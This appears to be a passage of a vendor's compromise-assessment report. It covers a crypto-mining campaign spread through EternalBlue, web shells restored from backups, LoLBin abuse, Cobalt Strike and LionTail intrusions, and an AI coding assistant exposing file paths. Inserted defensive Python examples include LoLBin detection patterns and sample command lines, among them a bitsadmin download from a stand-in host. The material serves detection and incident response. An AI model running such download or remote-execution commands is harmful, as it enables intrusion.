    Kaspersky Threat Intelligence confirmed that these files are part of a crypto-mining campaign called NSABuffMiner, which spreads via the SMB protocol by exploiting the EternalBlue (MS17-010) vulnerability. A patch was released for this vulnerability in March 2017, four years before the initial compromise. This was more than enough time to patch the systems. This underscores the importance of implementing effective patch management operations and staying informed through threat intelligence news feeds.

    Based on the organization’s request, the malicious files were collected along with a forensic image for analysis and revealed the following:

    • bat.bat and cmd.bat generate random IPs and scan them with a lightweight port scanner renamed taskhost.exe to locate live hosts with SMB port 445 and NetBIOS port 139 open and to look for vulnerable machines.
    • Discovered vulnerable IPs are handed to helper scripts named bat, poab.bat, load.bat, and loab.bat that execute the malware mance.exe, Eter.exe, and puls.exe to inject the malicious DLLs Eternalblue2.dll and Doublepulsar2.dll into lsass.exe and explorer.exe, enabling lateral movement.
    • Persistence is then established by creating scheduled tasks to execute the propagation and infection scripts, and services named MicrosoftMysql, MicrosoftFonts, and MicrosoftMSSql are created to execute the crypto miner. Other scheduled tasks named At1 and At2, created for the same purpose, were also observed.
    • After successfully compromising the machine and installing the persistence mechanisms, a cleanup task is performed to delete temporary files and dropped malware.

    Because of the lack of proper monitoring and threat hunting procedures, the organization was unaware that a mining operation had been hijacking their resources for four years, running on their domain controllers.

    Unintentional malware preservation

    An issue that is frequently discovered during compromise assessment activities is that of web shells remaining or being restored on target systems. Based on data collected during 2025 compromise assessment engagements, 64% of web shell incidents were classified as high-severity findings, 7% as low-severity (possibly legitimate files, but potentially compromised), and 29% as medium-severity findings requiring eradication.

    Web shell incident distribution by severity

    One way web shells persist is through infected backups. The distribution of discovered incidents in our projects shows that 60% of the web shells were located on active systems, while 40% were stored in backups. Restoring such backups can reintroduce the threat long after the initial infection.

    Web shell location

    Another common issue is asset inventory gaps, which were observed in 25% of engagements. This resulted in untracked devices, particularly cloud-only Linux web servers that are not joined to Active Directory, evading routine scans.

    Asset inventory issues

    An attacker can plant a web shell on such a cloud server, and that server never appears in the inventory, though it is still regularly backed up. As a result, the web shell may persist on the cloud server for a long time. If it is occasionally deleted, the backup server later restores the infected files, exposing the web shell to third parties again. This demonstrates that without a complete and up-to-date asset inventory, detection capabilities are significantly impaired.
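
A pre-restore check for the scenario above, as an added example that is not from the original report: it walks a backup archive, including archives nested inside it, and reports server-side script files that a known-good deployment manifest cannot vouch for. The manifest, the file names and the use of ZIP (Python's standard library does not read .rar) are assumptions; the sample archive is constructed in memory.

```python
import hashlib
import io
import zipfile

# Server-side script types that execute when requested through the web server.
SCRIPT_EXTS = (".aspx", ".ashx", ".asmx", ".php", ".jsp")
MAX_DEPTH = 3                        # nested-archive recursion limit
MAX_MEMBER_BYTES = 64 * 1024 * 1024  # do not unpack oversized members


def audit_backup(data, manifest, prefix="", depth=0):
    """Return [(path, reason)] for scripts the manifest cannot vouch for.

    manifest maps a path inside the archive to the SHA-256 of the file that
    was legitimately deployed (assumption: such a manifest exists).
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            lower = info.filename.lower()
            is_archive = lower.endswith(".zip")
            if not is_archive and not lower.endswith(SCRIPT_EXTS):
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append((path, "too-large-to-inspect"))
                continue
            blob = zf.read(info)
            if is_archive:
                # Backups of backups: an old site copy packed inside the archive.
                if depth >= MAX_DEPTH:
                    findings.append((path, "nested-too-deep"))
                elif zipfile.is_zipfile(io.BytesIO(blob)):
                    findings += audit_backup(blob, manifest, path + "/", depth + 1)
                continue
            expected = manifest.get(info.filename)
            if expected is None:
                findings.append((path, "unlisted"))
            elif expected != hashlib.sha256(blob).hexdigest():
                findings.append((path, "modified"))
    return findings


def make_zip(files):
    """Build a ZIP archive in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample data: file names and contents are placeholders.
GOOD_PAGE = b'<%@ Page Language="C#" %><html>ok</html>'
MANIFEST = {
    "wwwroot/default.aspx": hashlib.sha256(GOOD_PAGE).hexdigest(),
    "wwwroot/login.aspx": hashlib.sha256(b"login v1").hexdigest(),
}
INNER = make_zip({
    "wwwroot/default.aspx": GOOD_PAGE,
    "wwwroot/uploads/img.aspx": b"constructed placeholder, not a real web shell",
})
BACKUP = make_zip({
    "wwwroot/default.aspx": GOOD_PAGE,
    "wwwroot/login.aspx": b"login v1 plus an unexpected edit",
    "wwwroot/logo.png": b"\x89PNG",
    "old/site-2021.zip": INNER,
})

if __name__ == "__main__":
    for path, reason in audit_backup(BACKUP, MANIFEST):
        print(f"{reason:10} {path}")
```

Running the same audit against the archive that is about to be restored, rather than only against the live web root, is what catches a file that was cleaned from the server but still sits in the backup.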

    One case was observed in which the web shell was located on an internal file server (not a web server) within a .rar archive at the following path: D:\backup\[redacted_for_privacy].rar/wwwroot/<…>/[redacted_for_privacy].aspx

    During the investigation, the server administrators indicated that the folder had been copied from a different server that was offline at the time of the assessment. Because of poor asset inventory, the company’s security team did not detect the infection of this server. As a result of the backup procedure, the web shell was copied to the internal file server. Forensic analysis of the offline server revealed that the adversary had introduced a backdoor to the majority of the Windows servers in the environment, configuring the local administrator account with an identical password.

    The technique involved using PsExec to execute a .cmd script across all the servers listed in a .txt file; the script altered the local administrator password to a common value:

    Legitimate, yet suspicious: LoLBins and remote management tools

    In 2025, nonstandard remote management (RM) utilities were observed in all compromise assessment engagements. Living-off-the-land binaries (LoLBins) were also present in every engagement. These findings highlight the ongoing challenge for security operations centers (SOCs) that must distinguish between legitimate administrative use and malicious abuse.

    The observed remote management utilities span both proprietary platforms, such as TeamViewer and AnyDesk, and freely available tools, including PsExec, VNC servers, and open-source RM frameworks. These binaries are used daily in many environments for troubleshooting, software deployment, or remote support. However, the same capabilities – creating a new local admin account, copying files to a remote share, or launching a network port scan for diagnostics – are also typical of attacker post-exploitation activity. Our analysts frequently encounter cases where a legitimate sysadmin action resembles a lateral movement step. This makes the mere fact that “a remote management tool was executed” insufficient to classify it as an incident. Instead, the incident must be judged against an organization-specific baseline of expected usage. Establishing that baseline requires a deep, contextual understanding of who is authorized to run the tool, from which endpoints, and under which circumstances – a resource-intensive process on a case-by-case basis.

    LoLBins, binaries that are part of the operating system or commonly installed utilities (such as certutil, bitsadmin, regsvr32, and wmic), were also present in every assessment. While these files are trusted system components, threat intelligence confirms they are often repurposed for lateral movement, data exfiltration, and persistence. The graph below shows the severity distribution for incidents involving riskware or a LoLBin binary. The relatively high share of medium- (40%) and high-severity (31%) findings underscores that misuse of legitimate utilities is often the vector that enables a compromise to progress beyond the initial foothold.

    Severity distribution of incidents involving riskware or LoLBin involvement (2025)

    To address the potential use of LoLBins and remote management tools by attackers, we recommend a multi-layered approach that goes beyond static deny lists:

    1. Formalize a policy that enumerates the remote management tools authorized for use. The policy must be coupled with a requirement to forward software operational logs to a central log management platform (SIEM or dedicated log collector). Continuous monitoring of these logs enables a SOC to detect deviations from authorized usage patterns.
    2. Periodically perform a software inventory audit to identify unauthorized remote management tools. Consider collecting data from the following registry keys on all hosts:
      • HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall
      • HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall
      • HKEY_USERS\*\Software\Microsoft\Windows\CurrentVersion\Uninstall
      • HKEY_USERS\*\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
    3. Enrich the hashes (MD5/SHA-256) of every executed binary with a functional category, such as “Remote Access”, “Golden Image”, or “Security Software.” Correlating the category with the execution path makes it possible to hunt for instances where a “Remote Access” binary runs from a non-standard location, such as %TEMP% or a user’s Downloads folder.
    4. Deploy detection rules that capture known LoLBin abuse patterns, such as certutil -decode, bitsadmin -transfer, regsvr32 -i <dll>, wmic process call create. These rules should be continuously baselined against the organization’s normal activity. The baseline is derived from a period of verified legitimate use and refreshed whenever new legitimate use cases emerge. Alerts are generated only when observed behavior diverges from the established norm, thereby reducing noise while preserving sensitivity to genuine abuse.
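
One way to implement recommendations 3 and 4 above, as an added example that is not Kaspersky's tooling or part of the original report: process-creation events are enriched with a hash category, "Remote Access" binaries running from %TEMP% or Downloads are flagged, and the named LoLBin patterns alert only when they fall outside a baseline of verified use. The event fields, host and user names, placeholder hashes and the (rule, host, user) baseline key are assumptions.

```python
import re
from typing import NamedTuple


class Event(NamedTuple):
    host: str
    user: str
    image: str    # full path of the executed binary
    cmdline: str
    sha256: str


# Recommendation 3: hash -> functional category. Hashes are constructed placeholders.
RM_HASH, OS_HASH = "aa" * 32, "cc" * 32
HASH_CATEGORIES = {RM_HASH: "Remote Access", OS_HASH: "Golden Image"}

# A "Remote Access" binary is not expected to run from %TEMP% or Downloads.
NONSTANDARD_PATH = re.compile(r"\\(appdata\\local\\temp|downloads)\\", re.I)

# Recommendation 4: the patterns named in the text. Both "-" and "/" switch
# prefixes are accepted, because logged command lines may use either form.
LOLBIN_RULES = {
    "certutil-decode": re.compile(r"\bcertutil(\.exe)?\b.*[-/]decode\b", re.I),
    "bitsadmin-transfer": re.compile(r"\bbitsadmin(\.exe)?\b.*[-/]transfer\b", re.I),
    "regsvr32-i": re.compile(r"\bregsvr32(\.exe)?\b.*[-/]i\b", re.I),
    "wmic-process-create": re.compile(
        r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I),
}


def match_lolbin(cmdline):
    """Return the name of the first LoLBin rule the command line matches, or None."""
    for name, rx in LOLBIN_RULES.items():
        if rx.search(cmdline):
            return name
    return None


def build_baseline(verified_events):
    """Collect (rule, host, user) tuples seen during a verified-legitimate period."""
    baseline = set()
    for e in verified_events:
        rule = match_lolbin(e.cmdline)
        if rule:
            baseline.add((rule, e.host, e.user))
    return baseline


def hunt(events, baseline):
    """Return findings as (rule, host, user, evidence) tuples."""
    findings = []
    for e in events:
        category = HASH_CATEGORIES.get(e.sha256.lower())
        if category == "Remote Access" and NONSTANDARD_PATH.search(e.image):
            findings.append(("remote-access-nonstandard-path", e.host, e.user, e.image))
        rule = match_lolbin(e.cmdline)
        if rule and (rule, e.host, e.user) not in baseline:
            findings.append((rule, e.host, e.user, e.cmdline))
    return findings


# Constructed sample data: hosts, users and command lines are illustrative only.
CERTUTIL = r"C:\Windows\System32\certutil.exe"
VERIFIED = [
    Event("SRV-PKI01", "svc_pki", CERTUTIL,
          "certutil -decode request.b64 request.cer", OS_HASH),
]
OBSERVED = [
    Event("SRV-PKI01", "svc_pki", CERTUTIL,
          "certutil -decode renewal.b64 renewal.cer", OS_HASH),      # in baseline
    Event("WS-044", "j.doe", CERTUTIL,
          "certutil.exe -decode a.txt a.exe", OS_HASH),              # new host/user
    Event("WS-044", "j.doe", r"C:\Users\j.doe\Downloads\AnyDesk.exe",
          "AnyDesk.exe", RM_HASH),                                   # wrong location
    Event("HELPDESK-02", "it.support",
          r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
          "AnyDesk.exe --service", RM_HASH),                         # expected location
    Event("DC01", "administrator", r"C:\Windows\System32\wbem\WMIC.exe",
          'wmic /node:SRV-DB02 process call create "cmd.exe /c ipconfig"', OS_HASH),
    Event("WS-101", "m.lee", r"C:\Windows\System32\bitsadmin.exe",
          r"bitsadmin /transfer job1 http://files.example.invalid/a.bin C:\Temp\a.bin",
          OS_HASH),
]

if __name__ == "__main__":
    for finding in hunt(OBSERVED, build_baseline(VERIFIED)):
        print(finding)
```

The baseline should be rebuilt from a fresh verified period whenever a new legitimate use case appears, so that the set of suppressed tuples stays an explicit, reviewable list.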

    Impact of not having continuous monitoring and proactive threat hunting

    Analyses of recent compromise assessment projects reveal a systematic blind spot in organizations that follow the security-by-purchase model to defend their networks. Without continuous human monitoring or a dedicated threat hunting program, the severity profile of detected incidents becomes heavily skewed toward a higher impact:

    Incident severity breakdown, where 24/7 monitoring or threat hunting is absent

    | Control type             | Low-severity | Medium/high-severity |
    |--------------------------|--------------|----------------------|
    | No continuous monitoring | 14%          | 86%                  |
    | No threat hunting        | 16%          | 84%                  |

    Often, the problem is not a lack of tools, but rather a lack of operational use of those tools. Many enterprises deploy next-generation security solutions and then let them run in “set-and-forget” mode, or they rely exclusively on an alert-driven workflow. The following issues are common in such organizations:

    • Alert fatigue: high false positive rates drown analysts in noise, forcing them to triage superficial indicators rather than conduct deep, contextual investigations.
    • Fragmented analyst assignment: without a dedicated hunting team, the same analyst may be tasked with dozens of unrelated alerts, limiting the time available for the hypothesis-driven exploration required to uncover stealthy footholds.

    The practical consequence is that adversaries retain an extended dwell time, enabling continued lateral movement and data exfiltration before the organization becomes aware of the breach. This pattern represents a measurable risk exposure that translates directly into business impact. As the following example illustrates, merely purchasing security controls does not guarantee detection; continuous monitoring, regular alert validation, and structured threat hunting are essential to reduce dwell time and limit business impact.

    Case study: Secure by design without continuous monitoring

    The enterprise invested in security controls and assumed that the environment was secure by design. However, security controls require proper configuration, continuous tuning, and active monitoring to be effective. The tools had been installed, but no one was ensuring that the security controls were configured effectively, there was no analyst reviewing the alerts they produced, and no schedule existed to review the collected logs.

    The organization opted for Kaspersky’s Compromise Assessment service. Historical security logs were collected and investigated as part of the assessment procedures. The goal was simple: to determine what had really been going on in the network over the previous few months.

    Log analysis revealed clear evidence of malicious activity. Activities related to Impacket behavior were discovered that led to the deployment of Cobalt Strike and Mimikatz on several critical servers, including the domain controllers. These activities were three months old at the time of detection, and the enterprise was unaware of them because there was no effective 24/7 monitoring in place.

    Impacket is a collection of Python scripts for network protocols and low-level network packet manipulation. Attackers can abuse it to move laterally into the network. The following are examples of its artifacts detected in the network:

    The attacker used Impacket to execute a PowerShell command that downloaded an executable from a command-and-control server. This server was found to be associated with Cobalt Strike. Cobalt Strike is a post-exploitation tool that provides capabilities for remote command execution and lateral movement within a compromised network. The execution was set up via a scheduled task that attempted to masquerade as a legitimate Google Chrome update task.

    The timeline assessment confirmed the presence of a Mimikatz binary and a memory dump associated with the same incident on the compromised system, confirming that a credential theft operation had indeed taken place.

    The organization was completely unaware of the breach. The activity had gone undetected for three months because the deployed controls were never monitored. Upon learning of the findings, a full-scale incident response was initiated to eradicate the footholds, rotate credentials, and harden the security of the environment.

    Security controls are not self-sufficient. Deploying a firewall or an EDR solution does not automatically protect you. Without proper configuration, baseline tuning, and, most critically, continuous log monitoring and threat hunting, those controls become merely decorative. Always-on monitoring, either performed internally or delegated to an external managed security service, can turn weeks-old compromises into minutes-old alerts by correlating events, hunting for anomalous use of penetration testing or hacking tools, and escalating suspicious activity.

    Incident response action statistics

    An analysis of historical compromise assessment projects reveals a persistent discrepancy between the best practices described in incident response playbooks and the operational realities of executing them in unprepared, often legacy-affected environments. The figure below shows how frequently each response action was required during the initial response phase of a compromise assessment.

    Incident response actions required after compromise assessment

    The distribution highlights three frequently observed patterns:

    • Forensic analysis accounts for the majority of cases, with around 59% requiring at least one forensic package collection and analysis.
    • Remote eradication, i.e., file or registry key removal, was reported in 39% of cases.
    • Plans evolve as the investigation proceeds; 39% of engagements required a mid-engagement plan update, reflecting the iterative nature of incident response.

    Why forensic collection is the default entry point

    Forensic package collection and analysis was the most frequent response action, occurring in 59% of cases. The prevalence of forensic package collection can be explained by two observable factors in CA engagements: (1) the targeted organization’s limited historical visibility and (2) the fact that a substantial proportion of incidents were older than 90 days at the start of the assessment. In many cases, native logs had already been rotated or purged, forcing investigators to rely on residual artifacts (e.g., MFT entries, registry hives, filesystem timestamps) to reconstruct timelines.

    Our observations suggest that remote forensic package collection is effectively a prerequisite rather than an optional convenience. The graph below summarizes the reported ability to collect forensic packages, categorized by incident severity level. It highlights that, in a significant proportion of high-severity cases, the affected organization lacked this capability.

    The organization’s ability to collect forensic data by incident severity

    Containment: The remove files/registry keys paradox

    Response execution and eradication actions, such as file or registry key removal (reported in 39% of cases), were also common. However, they highlighted a notable gap in execution practices. While many organizations reported having EDR capabilities for remote removal, execution was often delegated to IT teams or MSPs via ticketing systems. This can introduce delays and reduce the precision of the removal process. Malware removal is a surgical process, particularly in multi-stage, fileless, or persistence-heavy scenarios. Capability alone is insufficient without expertise, sequencing, and planning, especially when artifacts may exist in shadow copies, backups, hidden paths, or downloader chains.

    Communication failures: An additional operational overhead

    A notable organizational finding emerged regarding communication. In 32% of projects, internal communication issues at the assessed organization materially impacted response execution. Below are the typical blockers:

    • Unclear action confirmation – system administrators could not quickly confirm whether a suspicious file was legitimate.
    • Delayed owner validation – ticket escalations stalled while waiting for system owners to respond.
    • Compromised communication channels – email accounts or ticketing portals may already be under the attacker’s control in the event of a suspected domain compromise.
    • Staff turnover – loss of knowledge about historical configuration baselines.

    These findings suggest that regular tabletop exercises are required to test not only technical playbooks, but also human and communication workflows, as well as operational level agreements that govern and facilitate communication between different teams, and standard operating procedures for proper documentation.

    The iterative nature of response plan updates

    The need to update response plans based on new analytical input arose in 39% of cases, emphasizing the inherently iterative nature of incident response. Early-stage plans cannot realistically account for all variables. Examples of the most commonly observed causes for updating the response plan are listed below:

    • Reverse engineering results that reveal previously unknown command-and-control (C2) servers or behaviors.
    • Forensic discoveries, such as hidden scheduled tasks, shadow-copy artifacts, or dormant DLLs.
    • Traffic analysis outcomes that expose additional lateral movement paths.
    • Human constraints – unavailable system owners, changes in management processes, or supervisor approval.

    Based on our experience, teams that treat the IR plan as a living document – incorporating each new artifact, reprioritizing actions, and reissuing the playbook before the next containment step – reduce the risk of missed eradication steps. Conversely, strict adherence to an initial, evidence-limited plan can increase the risk of overlooking persistent footholds.

    Distinguishing real attacker artifacts from penetration testing leftovers

    Finally, distinguishing attacker activity from penetration testing artifacts remained a recurring challenge (12% of cases). Compromise assessments frequently uncover remnants of legitimate testing tools, which can create uncertainty about whether a detected artifact originated from a malicious intrusion or a legitimate penetration test. Contributing factors:

    • Poorly documented penetration test report and artifact cleanup.
    • Overlapping toolsets (e.g., SharpHound) used by both red team operators and adversaries.
    • Running compromise assessments and active penetration testing projects simultaneously, which degrades analyst focus and increases false positive rates. Although correlating findings with penetration testing reports is essential, compromise assessments are human-driven investigative processes, and confusing analysts with overlapping “legitimate” attack signals leads to misinterpretation and weaker outcomes.
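One way to make the correlation with penetration test records systematic is shown below as an added example, not part of the original report. The record schema, hosts, dates, grace period and placeholder hashes are all assumptions; an artifact is written off as testing only when time window, authorized host and reported hash all match.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass(frozen=True)
class Engagement:            # one documented penetration test (hypothetical schema)
    name: str
    start: datetime
    end: datetime
    hosts: frozenset         # hosts the testers were authorized to touch
    tool_hashes: frozenset   # SHA-256 values listed in the test report

@dataclass(frozen=True)
class Finding:               # one artifact found during the compromise assessment
    host: str
    tool: str
    sha256: str
    seen: datetime

GRACE = timedelta(days=1)    # assumed tolerance for clock skew and late cleanup
HASH_A, HASH_B = "a" * 64, "b" * 64   # placeholders, not real hashes

# Constructed sample data.
ENGAGEMENTS = [Engagement("Q1 internal pentest", datetime(2025, 3, 3),
                          datetime(2025, 3, 14),
                          frozenset({"WS-017", "SRV-APP02"}), frozenset({HASH_A}))]
FINDINGS = [
    Finding("WS-017", "SharpHound", HASH_A, datetime(2025, 3, 5, 10, 12)),
    Finding("SRV-DC01", "SharpHound", HASH_A, datetime(2025, 3, 6, 2, 40)),
    Finding("SRV-FS03", "SharpHound", HASH_B, datetime(2025, 6, 21, 23, 5)),
    Finding("WS-017", "SharpHound", HASH_A, datetime(2025, 6, 21, 9, 0)),
]

def classify(f, engagements):
    """Return (verdict, reason); only a full match is attributed to testing."""
    best = ("unexplained", "no documented test accounts for it; handle as intrusion")
    for e in engagements:
        checks = {
            "time window": e.start - GRACE <= f.seen <= e.end + GRACE,
            "authorized host": f.host in e.hosts,
            "reported hash": f.sha256 in e.tool_hashes,
        }
        missing = [name for name, ok in checks.items() if not ok]
        if not missing:
            return "pentest", f"matches {e.name} on window, host and hash"
        if len(missing) == 1:   # near match: a human has to confirm with the testers
            best = ("ambiguous", f"{e.name}: {missing[0]} does not match")
    return best

def triage(findings, engagements):
    """Return (host, tool, verdict, reason) for every finding."""
    return [(f.host, f.tool, *classify(f, engagements)) for f in findings]

if __name__ == "__main__":
    for row in triage(FINDINGS, ENGAGEMENTS):
        print(row)
```

A hash-only match stays "unexplained" because the same public tool build can be used by both testers and adversaries.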

    Incident response maturity and its effect on severity

    Our data show a correlation between the presence of internal digital forensics or malware reverse engineering capabilities and the distribution of incident severity categories. Across the 2025 compromise assessment engagements, the distribution of low-, medium- and high-severity findings differed markedly between organizations that possessed these capabilities and those that did not. The data below illustrate this correlation and provide a basis for assessing the business value of expanding internal response skill sets.

    Incident severity split for cases requiring digital forensics, based on an organization’s capabilities

    Organizations capable of analyzing digital forensic artifacts independently experienced half as many high-severity incidents and a higher proportion of low- and medium-severity cases.

    Incident severity split for cases requiring malware analysis, based on an organization’s capabilities

    The presence of a dedicated reverse engineering resource correlates with a total absence of high-severity cases in our sample set; the majority of incidents were rated as medium severity, with a significant proportion of low-severity outcomes.

    The analysis of this correlation indicates, with medium confidence, that the observed shifts are unlikely to be caused solely by sample size effects. Rather, they are more likely to reflect a genuine operational phenomenon: internal digital forensics and malware analysis capabilities contribute not only to SOC processes, but also to cyber-resilience in general.

    Case study: In-memory LionTail infection on critical Windows servers

    During a compromise assessment, a persistent in-memory threat was identified on several critical servers. The activity was attributed to the LionTail framework, a sophisticated set of custom loaders and memory-resident shellcode implants. LionTail takes advantage of undocumented Windows HTTP.sys driver behaviors to covertly deliver and retrieve payloads via inbound HTTP traffic, effectively blending malicious activity into legitimate network flows.

    Several observed variants are attributed to the Scarred Manticore actor, which generates a unique implant per compromised host and performs data exfiltration while carefully masking command-and-control communications within normal-looking traffic.

    Detection was achieved through static memory signatures discovered within the scrcons.exe process. Although scrcons.exe is a legitimate WMI host binary located under C:\Windows\System32\wbem, it is frequently abused to host injected payloads, making it an attractive target for stealthy in-memory operations.

    The response plan comprised a number of actions, the most critical of which are highlighted below:

    • Collection of volatile memory dumps for in-depth analysis.
    • Acquisition of full forensic disk images from affected systems.
    • Detailed analysis of the collected artifacts and subsequent updates to the incident response plan.

    Executing these actions proved challenging for the organization because of its limited digital forensics and reverse engineering capabilities. In incidents dominated by fileless memory-resident threats, these capabilities are not optional – they are essential. Without them, organizations risk losing critical evidence, misjudging the scope of the compromise, or failing to fully eradicate advanced implants that leave minimal traces on disk.

    While our specialists were able to complete the investigation and contain the breach, the case revealed a readiness gap. It demonstrated the operational risk of depending on external assistance during high‑impact incidents and reinforced the necessity of in‑house forensic and reverse‑engineering maturity to achieve timely, confident and comprehensive incident handling.

    Solving the root cause problems

    Upon completion of a compromise assessment engagement, the focus shifts from incident response to a consulting phase. The final workshop focuses on preventing recurrence of incidents by identifying underlying deficiencies that allowed them to go unnoticed. The recommendations are actionable and tailored to the environment. For the purpose of this report, they have been grouped into a limited set of high-level categories.

    Root-cause categories, with share of incidents and typical findings:

    Insufficient detection fidelity – 60.7%
    • No high-confidence alerts were generated by the EPP/EDR or related log sources.
    • In 9.4% of cases, the product was mis-configured or out of date or malfunctioning.

    Missing alert-driven monitoring – 35.9%
    • Alerts that could have indicated compromise were generated, but an incident was not declared.
    • Signals with high uncertainty (e.g., heuristic web shell detections) required analyst validation.

    Deficient vulnerability and configuration management – 28.2%
    • Evident misconfigurations (e.g., disabled audit logging, over-permissive service accounts).
    • Known vulnerabilities left unpatched or unmitigated.

    Lack of structured threat hunting processes – 27.4%
    • Low-fidelity alerts were never reexamined after initial dismissal.
    • High-volume telemetry remained unchecked due to staffing constraints.

    Inadequate security awareness programs – 25.6%
    • Credential leaks from personal devices of employees or contractors accounted for 27.2% of incidents where inadequate security awareness was identified.
    • Social engineering attempts were successful because of insufficient user training.

    Absence of documented policies/processes – 23.9%
    • No formal incident response playbooks, change management procedures or data handling guidelines were available.

    Common observations on root causes

    The detection health check was the most frequent corrective action. In more than half of the cases where alerts were missing, a simple verification of sensor health and rule relevance was recommended to fill the gap. Without such validation, the failure could not be immediately attributed to product capability.

    Human analysis is still essential for low-confidence alerts. Automated pipelines alone cannot compensate for rules prone to false positives (e.g., generic web shell heuristics). Embedding a manual triage step was recommended to reduce the dwell time for incidents.

    Process hygiene (vulnerability management, threat hunting, security policies) accounts for a substantial proportion of the root causes. Even mature organizations exhibited gaps in routine activities that could be mitigated with disciplined workflows. The absence of documented policies/processes was the root cause of 23.9% of cases.

    A modern example of a policy gap is the use of generative AI development tools that operate without clear data handling rules. During one project, we identified a macOS workstation that executed the Claude Code (Anthropic) command-line assistant as a VS Code extension. The tool automatically captured filesystem snapshots to enrich its language model prompts. These snapshots included full directory listings and absolute paths to several Excel workbooks containing internal confidential data:

    Parent command line:
    /bin/zsh -c -l source /Users/[REDACTED]/.claude/shell-snapshots/snapshot-zsh-[REDACTED].sh && eval ‘ls -lh “/Users/[REDACTED]/Documents/[REDACTED]/”*.xlsx‘ \\< /dev/null && pwd -P >| /var/folders/[REDACTED]/claude-[REDACTED]

    Command line:
    ls -lh /Users/[REDACTED]/Documents/[REDACTED].xlsx /Users/[REDACTED]/Documents/[REDACTED].xlsx /Users/[REDACTED]/Documents/[REDACTED].xlsx .. [REDACTED]

    The organization was advised to conduct awareness sessions for employees on the risk of exposing confidential internal data to generative AI tools, and to develop a policy governing the use of such tools with confidential information.
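To support such a policy with evidence, process-creation telemetry can be reviewed for commands spawned through the assistant's shell snapshots, as in the record above. The following is an added example, not from the original report: the event schema, host and user names, file paths and the list of sensitive extensions are assumptions.

```python
import posixpath
import re
import shlex
from collections import defaultdict

# Parent command lines that source an assistant shell snapshot, as in the
# record above. The extension list is an assumption to tune per organization.
SNAPSHOT_RE = re.compile(r"/\.claude/shell-snapshots/snapshot-[\w.-]+\.sh\b")
SENSITIVE_EXT = {".xlsx", ".xls", ".docx", ".csv", ".pdf", ".kdbx"}

SNAP = ("/bin/zsh -c -l source /Users/alice/.claude/shell-snapshots/"
        "snapshot-zsh-0001.sh && eval ")
# Constructed process-creation events; every name and path is made up.
EVENTS = [
    {"host": "MAC-0042", "user": "alice",
     "parent_cmd": SNAP + "'ls -lh \"/Users/alice/Documents/Finance/\"*.xlsx'",
     "cmd": "ls -lh /Users/alice/Documents/Finance/budget.xlsx "
            "/Users/alice/Documents/Finance/payroll.xlsx"},
    {"host": "MAC-0042", "user": "alice",
     "parent_cmd": SNAP + "'git status'", "cmd": "git status"},
    # Interactive shell, no assistant involved: must not be reported.
    {"host": "MAC-0051", "user": "bob",
     "parent_cmd": "/bin/zsh -l", "cmd": "ls -lh /Users/bob/Documents/plan.xlsx"},
    # Telemetry truncated the closing quote: the parser must still cope.
    {"host": "MAC-0042", "user": "alice",
     "parent_cmd": SNAP + "'cat ...'",
     "cmd": 'cat "/Users/alice/Documents/HR/salaries.csv'},
]

def file_args(cmd):
    """Return the absolute-path arguments of a command line."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:            # unbalanced quotes in truncated telemetry
        tokens = cmd.split()
    paths = (t.strip("'\"") for t in tokens)
    return [p for p in paths if p.startswith("/")]

def exposures(events):
    """Map (host, user) to sensitive files touched by assistant-spawned commands."""
    hits = defaultdict(set)
    for ev in events:
        if not SNAPSHOT_RE.search(ev["parent_cmd"]):
            continue              # not spawned through an assistant snapshot
        for path in file_args(ev["cmd"]):
            if posixpath.splitext(path)[1].lower() in SENSITIVE_EXT:
                hits[(ev["host"], ev["user"])].add(path)
    return {key: sorted(paths) for key, paths in hits.items()}

if __name__ == "__main__":
    for (host, user), paths in exposures(EVENTS).items():
        print(host, user, paths)
```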

    Lack of detections: Causes and impacts

    Compromise assessment engagements repeatedly show that insufficient detection fidelity is a significant contributing factor to high-severity incidents. In cases where the target organization’s detection coverage was rated low, 52% of incidents were classified as high severity and 15% as low severity. This suggests a correlation: limited visibility appears to increase the proportion of incidents that evolve into high-severity compromises.

    Incident severity distribution when detection coverage was insufficient

    A common assumption is that engaging a managed security service provider (MSSP) improves detection maturity. The data, however, show a more nuanced picture. Even when an MSSP is engaged, 26.5% of incidents related to low detection coverage remain unidentified, and roughly 50% of MSSP-supported projects have basic Windows audit gaps (e.g., missing event log collection or disabled audit policies).

    These findings suggest that outsourcing alone does not guarantee effective detection; active governance and continuous validation are required. Detection should be treated as an evolving capability that requires continuous testing, measurement, and refinement, irrespective of whether it is managed internally or by a third party.

    Statistics of missed incidents due to lack of detection capability with or without MSSP

    The analysis of root causes of missed detections reveals several recurring themes. In many environments, the technology is present but poorly operationalized. The main issues are:

    • Absence of endpoint protection platform (EPP) health check – nearly 50% of incidents escalated to high severity in engagements where the EPP health check was weak or absent. This reflects the classic “installed-but-not-enforced” risk, where agents are present but not tuned, updated, or validated.
    • Threat intelligence gaps – when there was no functional threat intelligence feed or platform, about half of the incidents reached high severity. Without curated indicators of compromise and contextual enrichment, analysts rely on generic alerts and may overlook known malicious behaviors.

    The underlying issue is an alert-driven, set-and-forget mindset: organizations assume that deployed tools will automatically protect them, even though the tools are not continuously tuned, validated, or enriched with threat intelligence.

    Incident severity breakdown where there was no EPP health check or threat intelligence

    Missing control | High-severity | Medium-severity | Low-severity
    EPP health check | 48.3% | 36.7% | 15%
    Threat intelligence feed | 50% | 40% | 10%

    Detection failures are rarely caused by a single missing control; they emerge from weak configuration, insufficient telemetry, and an absence of regular checks of controls and processes to ensure they are functional, especially in outsourced models. A hybrid monitoring approach that combines internal ownership with external MDR or MSSP support consistently proves to be the most resilient model when roles, expectations, and performance metrics are clearly defined. Detection must be treated as a living function, not a procurement outcome.

    The following example illustrates the real-world consequences of control gaps by walking through a severe incident that persisted undetected for months simply because the organization lacked the necessary detection capabilities and security tools.

    Case study: In-memory PurpleFox infection evades conventional endpoint protection

    During a compromise assessment engagement, memory was scanned on the target hosts using the threat hunting rule set. Two hidden objects were identified:

